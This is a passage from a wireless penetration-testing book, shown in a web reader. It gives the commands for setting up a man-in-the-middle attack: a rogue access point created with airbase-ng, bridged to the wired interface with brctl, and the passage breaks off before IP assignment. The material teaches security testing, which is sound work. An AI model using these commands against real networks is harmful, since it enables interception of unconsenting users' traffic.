-
Book Overview & Buying
-
Table Of Contents
-
Feedback & Rating

Kali Linux Wireless Penetration Testing Beginner???s Guide
By :

Follow these instructions to get started:
To create the MITM attack setup, we will first create a soft access point called mitm
on the hacker laptop using airbase-ng
. We run the following command:
airbase-ng --essid mitm -c 11 wlan0mon
The output of the command is as follows:
It is important to note that airbase-ng
, when run, creates an interface at0
(a tap interface). Think of this as the wired-side interface of our software-based access point mitm
:
Let's now create a bridge on the hacker's laptop, consisting of the wired (eth0
) and wireless interface (at0
). The succession of commands used for this is as follows:
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
We can assign an IP address to this bridge and check the connectivity with the gateway. Please note that we can do this using DHCP as well. We can assign an IP address to the bridge interface with the following...
Change the font size
Change margin width
Change background colour